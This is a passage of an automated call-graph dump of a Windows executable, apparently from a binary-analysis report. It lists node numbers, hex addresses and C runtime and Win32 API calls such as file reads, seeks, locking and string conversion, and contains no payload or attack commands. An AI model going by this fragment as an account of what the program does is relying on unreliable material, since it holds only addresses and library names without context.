87224->87227 87228 452a3c 87224->87228 87226 413748 _free 46 API calls 87225->87226 87229 452a1c 87226->87229 87231 413748 _free 46 API calls 87227->87231 87791 44b1a9 87228->87791 87232 413748 _free 46 API calls 87229->87232 87234 452aa3 87231->87234 87235 452a25 87232->87235 87233 452a9d 87236 413748 _free 46 API calls 87233->87236 87234->87121 87235->87121 87236->87234 87238 431e64 87237->87238 87239 431e6a 87237->87239 87240 414a46 __fcloseall 82 API calls 87238->87240 87239->87122 87240->87239 87242 425de2 87241->87242 87246 40f6fc _wcslen 87241->87246 87242->87183 87243 40f710 WideCharToMultiByte 87244 40f756 87243->87244 87245 40f728 87243->87245 87244->87183 87247 4115d7 52 API calls 87245->87247 87246->87243 87248 40f735 WideCharToMultiByte 87247->87248 87248->87183 87252 40f85d __call_reportfault _strlen 87249->87252 87250 426b3b 87252->87250 87253 40f7ab 87252->87253 87298 414db8 87252->87298 87254 4149c2 87253->87254 87313 414904 87254->87313 87256 40f7e9 87256->87188 87257 40f5c0 87256->87257 87258 40f5cd _strcat __write_nolock _memmove 87257->87258 87259 414d04 __fread_nolock 61 API calls 87258->87259 87261 425d11 87258->87261 87265 40f691 __tzset_nolock 87258->87265 87401 4150d1 87258->87401 87259->87258 87262 4150d1 _fseek 81 API calls 87261->87262 87263 425d33 87262->87263 87264 414d04 __fread_nolock 61 API calls 87263->87264 87264->87265 87265->87190 87267 414a52 _fseek 87266->87267 87268 414a64 87267->87268 87269 414a79 87267->87269 87541 417f77 46 API calls __getptd_noexit 87268->87541 87272 415471 __lock_file 47 API calls 87269->87272 87276 414a74 _fseek 87269->87276 87271 414a69 87542 417f25 10 API calls __localtime64_s 87271->87542 87274 414a92 87272->87274 87525 4149d9 87274->87525 87276->87195 87610 414c76 87279->87610 87281 414d1c 87282 44afef 87281->87282 87778 442c5a 87282->87778 87284 44b00d 87284->87197 87286 414fee _fseek 87285->87286 87287 414ffa 87286->87287 87288 41500f 87286->87288 87782 417f77 46 API calls __getptd_noexit 87287->87782 87290 415471 __lock_file 47 API calls 87288->87290 87292 415017 87290->87292 87291 414fff 87783 417f25 10 API calls __localtime64_s 87291->87783 87294 414e4e __ftell_nolock 51 API calls 87292->87294 87296 415024 87294->87296 87295 41500a _fseek 87295->87199 87784 41503d LeaveCriticalSection LeaveCriticalSection _fprintf 87296->87784 87299 414dd6 87298->87299 87300 414deb 87298->87300 87309 417f77 46 API calls __getptd_noexit 87299->87309 87300->87299 87301 414df2 87300->87301 87311 41b91b 79 API calls 12 library calls 87301->87311 87304 414ddb 87310 417f25 10 API calls __localtime64_s 87304->87310 87305 414e18 87307 414de6 87305->87307 87312 418f98 77 API calls 4 library calls 87305->87312 87307->87252 87309->87304 87310->87307 87311->87305 87312->87307 87316 414910 _fseek 87313->87316 87314 414923 87369 417f77 46 API calls __getptd_noexit 87314->87369 87316->87314 87318 414951 87316->87318 87317 414928 87370 417f25 10 API calls __localtime64_s 87317->87370 87332 41d4d1 87318->87332 87321 414956 87322 41496a 87321->87322 87323 41495d 87321->87323 87324 414992 87322->87324 87325 414972 87322->87325 87371 417f77 46 API calls __getptd_noexit 87323->87371 87349 41d218 87324->87349 87372 417f77 46 API calls __getptd_noexit 87325->87372 87329 414933 _fseek @_EH4_CallFilterFunc@8 87329->87256 87333 41d4dd _fseek 87332->87333 87334 4182cb __lock 46 API calls 87333->87334 87345 41d4eb 87334->87345 87335 41d567 87337 416b04 __malloc_crt 46 API calls 87335->87337 87339 41d56e 87337->87339 87338 41d5f0 _fseek 87338->87321 87340 41d57c InitializeCriticalSectionAndSpinCount 87339->87340 87347 41d560 87339->87347 87343 41d59c 87340->87343 87344 41d5af EnterCriticalSection 87340->87344 87341 418209 __mtinitlocknum 46 API calls 87341->87345 87346 413748 _free 46 API calls 87343->87346 87344->87347 87345->87335 87345->87341 87345->87347 87377 4154b2 47 API calls __lock 87345->87377 87378 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87345->87378 87346->87347 87374 41d5fb 87347->87374 87350 41d23a 87349->87350 87351 41d255 87350->87351 87362 41d26c __wopenfile 87350->87362 87383 417f77 46 API calls __getptd_noexit 87351->87383 87353 41d25a 87384 417f25 10 API calls __localtime64_s 87353->87384 87354 41d47a 87388 417f77 46 API calls __getptd_noexit 87354->87388 87355 41d48c 87380 422bf9 87355->87380 87359 41d47f 87389 417f25 10 API calls __localtime64_s 87359->87389 87360 41499d 87373 4149b8 LeaveCriticalSection LeaveCriticalSection _fprintf 87360->87373 87362->87354 87368 41d421 87362->87368 87385 41341f 58 API calls 3 library calls 87362->87385 87364 41d41a 87364->87368 87386 41341f 58 API calls 3 library calls 87364->87386 87366 41d439 87366->87368 87387 41341f 58 API calls 3 library calls 87366->87387 87368->87354 87368->87355 87369->87317 87370->87329 87371->87329 87372->87329 87373->87329 87379 4181f2 LeaveCriticalSection 87374->87379 87376 41d602 87376->87338 87377->87345 87378->87345 87379->87376 87390 422b35 87380->87390 87382 422c14 87382->87360 87383->87353 87384->87360 87385->87364 87386->87366 87387->87368 87388->87359 87389->87360 87392 422b41 _fseek 87390->87392 87391 422b54 87393 417f77 __flsbuf 46 API calls 87391->87393 87392->87391 87394 422b8a 87392->87394 87395 422b59 87393->87395 87396 422400 __tsopen_nolock 109 API calls 87394->87396 87397 417f25 __localtime64_s 10 API calls 87395->87397 87398 422ba4 87396->87398 87400 422b63 _fseek 87397->87400 87399 422bcb __wsopen_helper LeaveCriticalSection 87398->87399 87399->87400 87400->87382 87404 4150dd _fseek 87401->87404 87402 4150e9 87432 417f77 46 API calls __getptd_noexit 87402->87432 87404->87402 87405 41510f 87404->87405 87414 415471 87405->87414 87406 4150ee 87433 417f25 10 API calls __localtime64_s 87406->87433 87413 4150f9 _fseek 87413->87258 87415 415483 87414->87415 87416 4154a5 EnterCriticalSection 87414->87416 87415->87416 87417 41548b 87415->87417 87418 415117 87416->87418 87419 4182cb __lock 46 API calls 87417->87419 87420 415047 87418->87420 87419->87418 87421 415067 87420->87421 87422 415057 87420->87422 87427 415079 87421->87427 87435 414e4e 87421->87435 87490 417f77 46 API calls __getptd_noexit 87422->87490 87426 41505c 87434 415143 LeaveCriticalSection LeaveCriticalSection _fprintf 87426->87434 87452 41443c 87427->87452 87430 4150b9 87465 41e1f4 87430->87465 87432->87406 87433->87413 87434->87413 87436 414e61 87435->87436 87437 414e79 87435->87437 87491 417f77 46 API calls __getptd_noexit 87436->87491 87439 414139 __flsbuf 46 API calls 87437->87439 87441 414e80 87439->87441 87440 414e66 87492 417f25 10 API calls __localtime64_s 87440->87492 87443 41e1f4 __write 51 API calls 87441->87443 87444 414e97 87443->87444 87445 414f09 87444->87445 87447 414ec9 87444->87447 87451 414e71 87444->87451 87493 417f77 46 API calls __getptd_noexit 87445->87493 87448 41e1f4 __write 51 API calls 87447->87448 87447->87451 87449 414f64 87448->87449 87450 41e1f4 __write 51 API calls 87449->87450 87449->87451 87450->87451 87451->87427 87453 414455 87452->87453 87457 414477 87452->87457 87454 414139 __flsbuf 46 API calls 87453->87454 87453->87457 87455 414470 87454->87455 87494 41b7b2 77 API calls 7 library calls 87455->87494 87458 414139 87457->87458 87459 414145 87458->87459 87460 41415a 87458->87460 87495 417f77 46 API calls __getptd_noexit 87459->87495 87460->87430 87462 41414a 87496 417f25 10 API calls __localtime64_s 87462->87496 87464 414155 87464->87430 87466 41e200 _fseek 87465->87466 87467 41e223 87466->87467 87468 41e208 87466->87468 87470 41e22f 87467->87470 87474 41e269 87467->87474 87517 417f8a 46 API calls __getptd_noexit 87468->87517 87519 417f8a 46 API calls __getptd_noexit 87470->87519 87471 41e20d 87518 417f77 46 API calls __getptd_noexit 87471->87518 87473 41e234 87520 417f77 46 API calls __getptd_noexit 87473->87520 87497 41ae56 87474->87497 87478 41e23c 87521 417f25 10 API calls __localtime64_s 87478->87521 87479 41e26f 87481 41e291 87479->87481 87482 41e27d 87479->87482 87522 417f77 46 API calls __getptd_noexit 87481->87522 87507 41e17f 87482->87507 87483 41e215 _fseek 87483->87426 87486 41e289 87524 41e2c0 LeaveCriticalSection __unlock_fhandle 87486->87524 87487 41e296 87523 417f8a 46 API calls __getptd_noexit 87487->87523 87490->87426 87491->87440 87492->87451 87493->87451 87494->87457 87495->87462 87496->87464 87498 41ae62 _fseek 87497->87498 87499 41aebc 87498->87499 87502 4182cb __lock 46 API calls 87498->87502 87500 41aec1 EnterCriticalSection 87499->87500 87501 41aede _fseek 87499->87501 87500->87501 87501->87479 87503 41ae8e 87502->87503 87504 41aeaa 87503->87504 87505 41ae97 InitializeCriticalSectionAndSpinCount 87503->87505 87506 41aeec ___lock_fhandle LeaveCriticalSection 87504->87506 87505->87504 87506->87499 87508 41aded __lseeki64_nolock 46 API calls 87507->87508 87509 41e18e 87508->87509 87510 41e1a4 SetFilePointer 87509->87510 87511 41e194 87509->87511 87512 41e1bb GetLastError 87510->87512 87514 41e1c3 87510->87514 87513 417f77 __flsbuf 46 API calls 87511->87513 87512->87514 87515 41e199 87513->87515 87514->87515 87516 417f9d __dosmaperr 46 API calls 87514->87516 87515->87486 87516->87515 87517->87471 87518->87483 87519->87473 87520->87478 87521->87483 87522->87487 87523->87486 87524->87483 87526 4149ea 87525->87526 87527 4149fe 87525->87527 87571 417f77 46 API calls __getptd_noexit 87526->87571 87530 41443c __flush 77 API calls 87527->87530 87539 4149fa 87527->87539 87529 4149ef 87572 417f25 10 API calls __localtime64_s 87529->87572 87532 414a0a 87530->87532 87544 41d8c2 87532->87544 87535 414139 __flsbuf 46 API calls 87536 414a18 87535->87536 87548 41d7fe 87536->87548 87538 414a1e 87538->87539 87540 413748 _free 46 API calls 87538->87540 87543 414ab2 LeaveCriticalSection LeaveCriticalSection _fprintf 87539->87543 87540->87539 87541->87271 87542->87276 87543->87276 87545 414a12 87544->87545 87546 41d8d2 87544->87546 87545->87535 87546->87545 87547 413748 _free 46 API calls 87546->87547 87547->87545 87549 41d80a _fseek 87548->87549 87550 41d812 87549->87550 87551 41d82d 87549->87551 87588 417f8a 46 API calls __getptd_noexit 87550->87588 87552 41d839 87551->87552 87557 41d873 87551->87557 87590 417f8a 46 API calls __getptd_noexit 87552->87590 87555 41d817 87589 417f77 46 API calls __getptd_noexit 87555->87589 87556 41d83e 87591 417f77 46 API calls __getptd_noexit 87556->87591 87560 41ae56 ___lock_fhandle 48 API calls 87557->87560 87562 41d879 87560->87562 87561 41d846 87592 417f25 10 API calls __localtime64_s 87561->87592 87564 41d893 87562->87564 87565 41d887 87562->87565 87593 417f77 46 API calls __getptd_noexit 87564->87593 87573 41d762 87565->87573 87567 41d81f _fseek 87567->87538 87569 41d88d 87594 41d8ba LeaveCriticalSection __unlock_fhandle 87569->87594 87571->87529 87572->87539 87595 41aded 87573->87595 87575 41d7c8 87608 41ad67 47 API calls 2 library calls 87575->87608 87576 41d772 87576->87575 87577 41d7a6 87576->87577 87579 41aded __lseeki64_nolock 46 API calls 87576->87579 87577->87575 87580 41aded __lseeki64_nolock 46 API calls 87577->87580 87582 41d79d 87579->87582 87583 41d7b2 CloseHandle 87580->87583 87581 41d7d0 87584 41d7f2 87581->87584 87609 417f9d 46 API calls 3 library calls 87581->87609 87586 41aded __lseeki64_nolock 46 API calls 87582->87586 87583->87575 87587 41d7be GetLastError 87583->87587 87584->87569 87586->87577 87587->87575 87588->87555 87589->87567 87590->87556 87591->87561 87592->87567 87593->87569 87594->87567 87596 41ae12 87595->87596 87597 41adfa 87595->87597 87600 417f8a __read_nolock 46 API calls 87596->87600 87601 41ae51 87596->87601 87598 417f8a __read_nolock 46 API calls 87597->87598 87599 41adff 87598->87599 87602 417f77 __flsbuf 46 API calls 87599->87602 87603 41ae23 87600->87603 87601->87576 87604 41ae07 87602->87604 87605 417f77 __flsbuf 46 API calls 87603->87605 87604->87576 87606 41ae2b 87605->87606 87607 417f25 __localtime64_s 10 API calls 87606->87607 87607->87604 87608->87581 87609->87584 87611 414c82 _fseek 87610->87611 87612 414cc3 87611->87612 87613 414cbb _fseek 87611->87613 87618 414c96 __call_reportfault 87611->87618 87614 415471 __lock_file 47 API calls 87612->87614 87613->87281 87616 414ccb 87614->87616 87623 414aba 87616->87623 87637 417f77 46 API calls __getptd_noexit 87618->87637 87619 414cb0 87638 417f25 10 API calls __localtime64_s 87619->87638 87627 414ad8 __call_reportfault 87623->87627 87629 414af2 87623->87629 87624 414ae2 87690 417f77 46 API calls __getptd_noexit 87624->87690 87626 414ae7 87691 417f25 10 API calls __localtime64_s 87626->87691 87627->87624 87627->87629 87632 414b2d 87627->87632 87639 414cfa LeaveCriticalSection LeaveCriticalSection _fprintf 87629->87639 87631 414c38 __call_reportfault 87693 417f77 46 API calls __getptd_noexit 87631->87693 87632->87629 87632->87631 87633 414139 __flsbuf 46 API calls 87632->87633 87640 41dfcc 87632->87640 87670 41d8f3 87632->87670 87692 41e0c2 46 API calls 4 library calls 87632->87692 87633->87632 87637->87619 87638->87613 87639->87613 87641 41dfd8 _fseek 87640->87641 87642 41dfe0 87641->87642 87643 41dffb 87641->87643 87763 417f8a 46 API calls __getptd_noexit 87642->87763 87645 41e007 87643->87645 87648 41e041 87643->87648 87765 417f8a 46 API calls __getptd_noexit 87645->87765 87646 41dfe5 87764 417f77 46 API calls __getptd_noexit 87646->87764 87651 41e063 87648->87651 87652 41e04e 87648->87652 87650 41e00c 87766 417f77 46 API calls __getptd_noexit 87650->87766 87656 41ae56 ___lock_fhandle 48 API calls 87651->87656 87768 417f8a 46 API calls __getptd_noexit 87652->87768 87653 41dfed _fseek 87653->87632 87659 41e069 87656->87659 87657 41e014 87767 417f25 10 API calls __localtime64_s 87657->87767 87658 41e053 87769 417f77 46 API calls __getptd_noexit 87658->87769 87662 41e077 87659->87662 87663 41e08b 87659->87663 87694 41da15 87662->87694 87770 417f77 46 API calls __getptd_noexit 87663->87770 87666 41e090 87771 417f8a 46 API calls __getptd_noexit 87666->87771 87667 41e083 87772 41e0ba LeaveCriticalSection __unlock_fhandle 87667->87772 87671 41d900 87670->87671 87675 41d915 87670->87675 87776 417f77 46 API calls __getptd_noexit 87671->87776 87673 41d905 87777 417f25 10 API calls __localtime64_s 87673->87777 87676 41d94a 87675->87676 87684 41d910 87675->87684 87773 420603 87675->87773 87678 414139 __flsbuf 46 API calls 87676->87678 87679 41d95e 87678->87679 87680 41dfcc __read 59 API calls 87679->87680 87681 41d965 87680->87681 87682 414139 __flsbuf 46 API calls 87681->87682 87681->87684 87683 41d988 87682->87683 87683->87684 87685 414139 __flsbuf 46 API calls 87683->87685 87684->87632 87686 41d994 87685->87686 87686->87684 87687 414139 __flsbuf 46 API calls 87686->87687 87688 41d9a1 87687->87688 87689 414139 __flsbuf 46 API calls 87688->87689 87689->87684 87690->87626 87691->87629 87692->87632 87693->87626 87695 41da31 87694->87695 87696 41da4c 87694->87696 87697 417f8a __read_nolock 46 API calls 87695->87697 87698 41da5b 87696->87698 87700 41da7a 87696->87700 87699 41da36 87697->87699 87701 417f8a __read_nolock 46 API calls 87698->87701 87702 417f77 __flsbuf 46 API calls 87699->87702 87704 41da98 87700->87704 87707 41daac 87700->87707 87703 41da60 87701->87703 87738 41da3e 87702->87738 87708 417f77 __flsbuf 46 API calls 87703->87708 87705 417f8a __read_nolock 46 API calls 87704->87705 87709 41da9d 87705->87709 87706 41db02 87711 417f8a __read_nolock 46 API calls 87706->87711 87707->87706 87717 41dae1 87707->87717 87719 41db1b 87707->87719 87707->87738 87710 41da67 87708->87710 87713 417f77 __flsbuf 46 API calls 87709->87713 87714 417f25 __localtime64_s 10 API calls 87710->87714 87712 41db07 87711->87712 87715 417f77 __flsbuf 46 API calls 87712->87715 87716 41daa4 87713->87716 87714->87738 87715->87716 87718 417f25 __localtime64_s 10 API calls 87716->87718 87717->87706 87722 41daec ReadFile 87717->87722 87718->87738 87721 416b04 __malloc_crt 46 API calls 87719->87721 87723 41db31 87721->87723 87724 41dc17 87722->87724 87725 41df8f GetLastError 87722->87725 87728 41db59 87723->87728 87729 41db3b 87723->87729 87724->87725 87730 41dc2b 87724->87730 87726 41de16 87725->87726 87727 41df9c 87725->87727 87737 417f9d __dosmaperr 46 API calls 87726->87737 87742 41dd9b 87726->87742 87732 417f77 __flsbuf 46 API calls 87727->87732 87731 420494 __lseeki64_nolock 48 API calls 87728->87731 87733 417f77 __flsbuf 46 API calls 87729->87733 87730->87742 87744 41de5b 87730->87744 87745 41dc47 87730->87745 87734 41db67 87731->87734 87735 41dfa1 87732->87735 87736 41db40 87733->87736 87734->87722 87739 417f8a __read_nolock 46 API calls 87735->87739 87740 417f8a __read_nolock 46 API calls 87736->87740 87737->87742 87738->87667 87739->87742 87740->87738 87741 413748 _free 46 API calls 87741->87738 87742->87738 87742->87741 87743 41ded0 ReadFile 87748 41deef GetLastError 87743->87748 87755 41def9 87743->87755 87744->87742 87744->87743 87746 41dcab ReadFile 87745->87746 87751 41dd28 87745->87751 87747 41dcc9 GetLastError 87746->87747 87754 41dcd3 87746->87754 87747->87745 87747->87754 87748->87744 87748->87755 87749 41ddec MultiByteToWideChar 87749->87742 87750 41de10 GetLastError 87749->87750 87750->87726 87751->87742 87752 41dda3 87751->87752 87753 41dd96 87751->87753 87757 41dd60 87751->87757 87752->87757 87758 41ddda 87752->87758 87756 417f77 __flsbuf 46 API calls 87753->87756 87754->87745 87759 420494 __lseeki64_nolock 48 API calls 87754->87759 87755->87744 87760 420494 __lseeki64_nolock 48 API calls 87755->87760 87756->87742 87757->87749 87761 420494 __lseeki64_nolock 48 API calls 87758->87761 87759->87754 87760->87755 87762 41dde9 87761->87762 87762->87749 87763->87646 87764->87653 87765->87650 87766->87657 87767->87653 87768->87658 87769->87657 87770->87666 87771->87667 87772->87653 87774 416b04 __malloc_crt 46 API calls 87773->87774 87775 420618 87774->87775 87775->87676 87776->87673 87777->87684 87781 4148b3 GetSystemTimeAsFileTime __aulldiv 87778->87781 87780 442c6b 87780->87284 87781->87780 87782->87291 87783->87295 87784->87295 87789 45272f __tzset_nolock _wcscpy 87785->87789 87786 414d04 61 API calls __fread_nolock 87786->87789 87787 4528a4 87787->87205 87787->87206 87788 44afef GetSystemTimeAsFileTime 87788->87789 87789->87786 87789->87787 87789->87788 87790 4150d1 81 API calls _fseek 87789->87790 87790->87789 87792 44b1bc 87791->87792 87793 44b1ca 87791->87793 87794 4149c2 116 API calls 87792->87794 87795 44b1e1 87793->87795 87796 4149c2 116 API calls 87793->87796 87797 44b1d8 87793->87797 87794->87793 87826 4321a4 87795->87826 87798 44b2db 87796->87798 87797->87233 87798->87795 87800 44b2e9 87798->87800 87802 44b2f6 87800->87802 87805 414a46 __fcloseall 82 API calls 87800->87805 87801 44b224 87803 44b253 87801->87803 87804 44b228 87801->87804 87802->87233 87830 43213d 87803->87830 87807 44b235 87804->87807 87810 414a46 __fcloseall 82 API calls 87804->87810 87805->87802 87808 44b245 87807->87808 87811 414a46 __fcloseall 82 API calls 87807->87811 87808->87233 87809 44b25a 87812 44b260 87809->87812 87813 44b289 87809->87813 87810->87807 87811->87808 87815 44b26d 87812->87815 87817 414a46 __fcloseall 82 API calls 87812->87817 87840 44b0bf 87 API calls 87813->87840 87818 44b27d 87815->87818 87820 414a46 __fcloseall 82 API calls 87815->87820 87816 44b28f 87841 4320f8 46 API calls _free 87816->87841 87817->87815 87818->87233 87820->87818 87821 44b295 87822 44b2a2 87821->87822 87823 414a46 __fcloseall 82 API calls 87821->87823 87824 44b2b2 87822->87824 87825 414a46 __fcloseall 82 API calls 87822->87825 87823->87822 87824->87233 87825->87824 87827 4321cb 87826->87827 87829 4321b4 __tzset_nolock _memmove 87826->87829 87828 414d04 __fread_nolock 61 API calls 87827->87828 87828->87829 87829->87801 87831 4135bb _malloc 46 API calls 87830->87831 87832 432150 87831->87832 87833 4135bb _malloc 46 API calls 87832->87833 87834 432162 87833->87834 87835 4135bb _malloc 46 API calls 87834->87835 87836 432174 87835->87836 87838 432189 87836->87838 87842 4320f8 46 API calls _free 87836->87842 87838->87809 87839 432198 87839->87809 87840->87816 87841->87821 87842->87839 87843->87135 87844->87138 87845->87153 87846->87153 87847->87153 87848->87147 87849->87153 87850->87153 87851->87160 87852->87169 87853->87171 87854->87171 87904 410160 87855->87904 87857 41012f GetFullPathNameW 87858 410147 moneypunct 87857->87858 87858->86991 87860 4102cb SHGetDesktopFolder 87859->87860 87863 410333 _wcsncpy 87859->87863 87861 4102e0 _wcsncpy 87860->87861 87860->87863 87862 41031c SHGetPathFromIDListW 87861->87862 87861->87863 87862->87863 87863->86994 87865 4101bb 87864->87865 87872 425f4a 87864->87872 87866 410160 52 API calls 87865->87866 87868 4101c7 87866->87868 87867 4114ab __wcsicoll 58 API calls 87867->87872 87908 410200 52 API calls 2 library calls 87868->87908 87870 4101d6 87909 410200 52 API calls 2 library calls 87870->87909 87871 425f6e 87871->86996 87872->87867 87872->87871 87874 4101e9 87874->86996 87876 40f760 128 API calls 87875->87876 87877 40f584 87876->87877 87878 429335 87877->87878 87879 40f58c 87877->87879 87882 4528bd 118 API calls 87878->87882 87880 40f598 87879->87880 87881 429358 87879->87881 87927 4033c0 113 API calls 7 library calls 87880->87927 87928 434034 86 API calls _wprintf 87881->87928 87885 42934b 87882->87885 87888 429373 87885->87888 87889 42934f 87885->87889 87886 429369 87886->87888 87887 40f5b4 87887->86992 87891 4115d7 52 API calls 87888->87891 87890 431e58 82 API calls 87889->87890 87890->87881 87898 4293c5 moneypunct 87891->87898 87892 42959c 87893 413748 _free 46 API calls 87892->87893 87894 4295a5 87893->87894 87895 431e58 82 API calls 87894->87895 87896 4295b1 87895->87896 87898->87892 87901 401b10 52 API calls 87898->87901 87910 444af8 87898->87910 87913 402780 87898->87913 87921 4022d0 87898->87921 87929 44c7dd 64 API calls 3 library calls 87898->87929 87930 44b41c 52 API calls 87898->87930 87901->87898 87905 410167 _wcslen 87904->87905 87906 4115d7 52 API calls 87905->87906 87907 41017e _wcscpy 87906->87907 87907->87857 87908->87870 87909->87874 87911 4115d7 52 API calls 87910->87911 87912 444b27 _memmove 87911->87912 87912->87898 87914 402827 87913->87914 87917 402790 moneypunct _memmove 87913->87917 87916 4115d7 52 API calls 87914->87916 87915 4115d7 52 API calls 87918 402797 87915->87918 87916->87917 87917->87915 87919 4027bd 87918->87919 87920 4115d7 52 API calls 87918->87920 87919->87898 87920->87919 87922 4022e0 87921->87922 87924 40239d 87921->87924 87923 4115d7 52 API calls 87922->87923 87922->87924 87925 402320 moneypunct 87922->87925 87923->87925 87924->87898 87925->87924 87926 4115d7 52 API calls 87925->87926 87926->87925 87927->87887 87928->87886 87929->87898 87930->87898 87932 402539 moneypunct 87931->87932 87933 402417 87931->87933 87932->87000 87933->87932 87934 4115d7 52 API calls 87933->87934 87935 402443 87934->87935 87936 4115d7 52 API calls 87935->87936 87937 4024b4 87936->87937 87937->87932 87939 4022d0 52 API calls 87937->87939 87960 402880 95 API calls 2 library calls 87937->87960 87939->87937 87944 401566 87940->87944 87941 401794 87961 40e9a0 90 API calls 87941->87961 87944->87941 87945 4010a0 52 API calls 87944->87945 87946 40167a 87944->87946 87945->87944 87947 4017c0 87946->87947 87962 45e737 90 API calls 3 library calls 87946->87962 87947->87002 87949 40bc70 52 API calls 87948->87949 87958 40d451 87949->87958 87950 40d50f 87965 410600 52 API calls 87950->87965 87952 427c01 87966 45e737 90 API calls 3 library calls 87952->87966 87953 40e0a0 52 API calls 87953->87958 87955 401b10 52 API calls 87955->87958 87956 40d519 87956->87005 87958->87950 87958->87952 87958->87953 87958->87955 87958->87956 87963 40f310 53 API calls 87958->87963 87964 40d860 91 API calls 87958->87964 87960->87937 87961->87946 87962->87947 87963->87958 87964->87958 87965->87956 87966->87956 87967->87019 87968->87018 87970 4091c6 87969->87970 87971 42c5fe 87969->87971 87970->87081 87971->87970 87972 40bc70 52 API calls 87971->87972 87973 42c64e InterlockedIncrement 87972->87973 87974 42c665 87973->87974 87979 42c697 87973->87979 87977 42c672 InterlockedDecrement Sleep InterlockedIncrement 87974->87977 87974->87979 87975 42c737 InterlockedDecrement 87976 42c74a 87975->87976 87980 408f40 VariantClear 87976->87980 87977->87974 87977->87979 87978 42c731 87978->87975 87979->87975 87979->87978 88262 408e80 87979->88262 87982 42c752 87980->87982 88271 410c60 VariantClear moneypunct 87982->88271 87986 42c6db 87987 402160 52 API calls 87986->87987 87988 42c6e5 87987->87988 88267 45340c 85 API calls 87988->88267 87990 42c6f1 88268 40d200 52 API calls 2 library calls 87990->88268 87992 42c6fb 88269 465124 53 API calls 87992->88269 87994 42c715 87995 42c76a 87994->87995 87996 42c719 87994->87996 87998 401b10 52 API calls 87995->87998 88270 46fe32 VariantClear 87996->88270 87999 42c77e 87998->87999 88000 401980 53 API calls 87999->88000 88006 42c796 88000->88006 88001 42c812 88273 46fe32 VariantClear 88001->88273 88003 42c82a InterlockedDecrement 88274 46ff07 54 API calls 88003->88274 88005 42c864 88275 45e737 90 API calls 3 library calls 88005->88275 88006->88001 88006->88005 88272 40ba10 52 API calls 2 library calls 88006->88272 88008 42c9ec 88318 47d33e 329 API calls 88008->88318 88011 42c9fe 88319 46feb1 VariantClear VariantClear 88011->88319 88013 408f40 VariantClear 88024 42c849 88013->88024 88014 42ca08 88017 401b10 52 API calls 88014->88017 88015 42c874 88016 408f40 VariantClear 88015->88016 88026 42ca59 88015->88026 88018 42c891 88016->88018 88019 42ca15 88017->88019 88276 410c60 VariantClear moneypunct 88018->88276 88022 40c2c0 52 API calls 88019->88022 88021 401980 53 API calls 88021->88024 88022->88015 88023 402780 52 API calls 88023->88024 88024->88008 88024->88013 88024->88021 88024->88023 88277 40a780 88024->88277 88026->88026 88028 40afc4 88027->88028 88029 40b156 88027->88029 88030 40afd5 88028->88030 88031 42d1e3 88028->88031 88329 45e737 90 API calls 3 library calls 88029->88329 88036 40a780 192 API calls 88030->88036 88049 40b11a moneypunct 88030->88049 88330 45e737 90 API calls 3 library calls 88031->88330 88034 42d1f8 88040 408f40 VariantClear 88034->88040 88035 40b143 88035->87081 88038 40b00a 88036->88038 88038->88034 88041 40b012 88038->88041 88039 42d4db 88039->88039 88040->88035 88042 40b04a 88041->88042 88043 40b094 moneypunct 88041->88043 88044 42d231 VariantClear 88041->88044 88051 40b05c moneypunct 88042->88051 88331 40e270 VariantClear moneypunct 88042->88331 88045 40b108 88043->88045 88048 42d425 moneypunct 88043->88048 88044->88051 88045->88049 88332 40e270 VariantClear moneypunct 88045->88332 88046 42d45a VariantClear 88046->88049 88048->88046 88048->88049 88049->88035 88333 45e737 90 API calls 3 library calls 88049->88333 88050 4115d7 52 API calls 88050->88043 88051->88043 88051->88050 88054 408fff 88053->88054 88065 40900d 88053->88065 88334 403ea0 52 API calls __cinit 88054->88334 88057 42c3f6 88337 45e737 90 API calls 3 library calls 88057->88337 88059 42c44a 88339 45e737 90 API calls 3 library calls 88059->88339 88060 40a780 192 API calls 88060->88065 88061 42c47b 88340 451b42 61 API calls 88061->88340 88065->88057 88065->88059 88065->88060 88065->88061 88066 42c4cb 88065->88066 88067 42c564 88065->88067 88071 42c548 88065->88071 88073 409112 88065->88073 88075 42c528 88065->88075 88077 4090df 88065->88077 88078 4090ea 88065->88078 88087 4090f2 moneypunct 88065->88087 88336 4534e3 52 API calls 88065->88336 88338 40c4e0 192 API calls 88065->88338 88342 47faae 231 API calls 88066->88342 88068 408f40 VariantClear 88067->88068 88068->88087 88069 42c491 88069->88087 88341 45e737 90 API calls 3 library calls 88069->88341 88345 45e737 90 API calls 3 library calls 88071->88345 88072 42c4da 88072->88087 88343 45e737 90 API calls 3 library calls 88072->88343 88073->88071 88081 40912b 88073->88081 88344 45e737 90 API calls 3 library calls 88075->88344 88077->88078 88079 408e80 VariantClear 88077->88079 88083 408f40 VariantClear 88078->88083 88079->88078 88081->88087 88335 403e10 53 API calls 88081->88335 88083->88087 88085 40914b 88086 408f40 VariantClear 88085->88086 88086->88087 88087->87081 88346 408d90 88088->88346 88090 429778 88373 410c60 VariantClear moneypunct 88090->88373 88092 429780 88093 408cf9 88093->88090 88094 42976c 88093->88094 88096 408d2d 88093->88096 88372 45e737 90 API calls 3 library calls 88094->88372 88362 403d10 88096->88362 88099 408d45 moneypunct 88100 408d71 moneypunct 88099->88100 88101 408f40 VariantClear 88099->88101 88100->87081 88101->88099 88103 425c87 88102->88103 88106 40d15f 88102->88106 88104 425cc7 88103->88104 88105 425ca1 TranslateAcceleratorW 88103->88105 88105->88106 88106->87081 88108 42602f 88107->88108 88111 40d17f 88107->88111 88108->87081 88109 40d18c 88109->87081 88110 42608e IsDialogMessageW 88110->88109 88110->88111 88111->88109 88111->88110 88645 430c46 GetClassLongW 88111->88645 88114 4096c6 _wcslen 88113->88114 88115 4115d7 52 API calls 88114->88115 88177 40a70c moneypunct _memmove 88114->88177 88116 4096fa _memmove 88115->88116 88117 4115d7 52 API calls 88116->88117 88119 40971b 88117->88119 88118 4013a0 52 API calls 88120 4297aa 88118->88120 88121 409749 CharUpperBuffW 88119->88121 88125 40976a moneypunct 88119->88125 88119->88177 88122 4115d7 52 API calls 88120->88122 88121->88125 88164 4297d1 _memmove 88122->88164 88173 4097e5 moneypunct 88125->88173 88647 47dcbb 194 API calls 88125->88647 88126 408f40 VariantClear 88127 42ae92 88126->88127 88674 410c60 VariantClear moneypunct 88127->88674 88129 42aea4 88130 409aa2 88132 4115d7 52 API calls 88130->88132 88137 409afe 88130->88137 88130->88164 88131 40a689 88134 4115d7 52 API calls 88131->88134 88132->88137 88133 4115d7 52 API calls 88133->88173 88150 40a6af moneypunct _memmove 88134->88150 88135 409b2a 88139 429dbe 88135->88139 88205 409b4d moneypunct _memmove 88135->88205 88655 40b400 VariantClear VariantClear moneypunct 